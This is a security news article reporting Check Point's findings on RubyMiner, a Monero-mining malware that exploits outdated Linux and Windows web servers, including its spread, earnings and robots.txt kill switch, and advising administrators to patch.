RubyMiner Malware found Targeting outdated Linux and Windows Servers

No featured articles available

Check back soon for the latest updates and featured content.

Security researchers have discovered a new strain of malware named RubyMiner targeting outdated Linux and Windows web servers.The malware is a cryptocurrency miner and installs a modified version XMRig monero miner application on vulnerable systems.According to Check Point Researchers said the attack began on January 9-10 and within 24 hours 30% of networks worldwide experienced compromise attempts by the malware.The malware uses web server fingerprinting tool called p0f to identify outdated windows and Linux web server. Security firm Certego also reported a huge spike in ruby HTTP exploiting since January 10th.Top countries which were targeted include United States, Germany, United Kingdom, Norway, and Sweden. Researchers also found targeted attacks on servers like PHP, Microsoft IIS, and Ruby on Rails.Once identified the attacker exploit multiple web server vulnerabilities to inject malicious codes into outdated systems.“XMRig usually sends a donation of 5% of the revenue gained from the mining process to the code’s author. However, even this amount was too much for the attacker to part with as that ‘donation element’ was deleted from the code, giving the enthusiast 100% of the profit” said in the post published by Check Point.

According to Check Point researchers as of January 11th, the number of servers infected is approximately 700 and estimated earnings is around $540.

The malware is programmed to run not only the mining process hourly but to run the whole process and download the file from the server.

This allows the attacker to initiate an immediate kill switch for the miner bot. To end the process, the attacker just need to modify the robots.txt file on the compromised web server.

Last week, monero miner was

discovered

on the official website of blackberry mobile. CoinHive’s cryptocurrency code was added to website to mine monero.

Users and administrators are advised to patch their servers with latest updates immediately and take necessary security precautions to prevent infection.

Google Ads Exploited in Cyberattack: Hackers Steal Login Details and 2FA Codes

Murdoc Botnet Exploits AVTECH Cameras and Huawei Routers

Authquake Attack Bypasses Microsoft MFA, Exposing Critical Security Vulnerabilities

Strategies for Mitigating Cyber Threats in 2025

Cybersecurity Threats in Social Media Networks: Protecting User Data

AI in Data Privacy Compliance

Secure Boot Bypass Flaw Found in Palo Alto Firewalls

Volkswagen Faces Major Breach: Data of 800K EV Customers Leaked

Successful CISO – Is a Business Enabler the Need of the Hour?

Behind the Job Title: Information Security Consultant

Cybersecurity Threats in Social Media Networks: Protecting User Data

AI in Data Privacy Compliance

No featured articles available

RubyMiner Malware found Targeting outdated Linux and Windows Servers

Security researchers have discovered a new strain of malware named RubyMiner targeting outdated Linux and Windows web servers.The malware is a cryptocurrency miner and installs a modified version XMRig monero miner application on vulnerable systems.

Share Your Story!

No featured articles available

Security researchers have discovered a new strain of malware named RubyMiner targeting outdated Linux and Windows web servers.The malware is a cryptocurrency miner and installs a modified version XMRig monero miner application on vulnerable systems.

Stay Updated with the Latest Cybersecurity News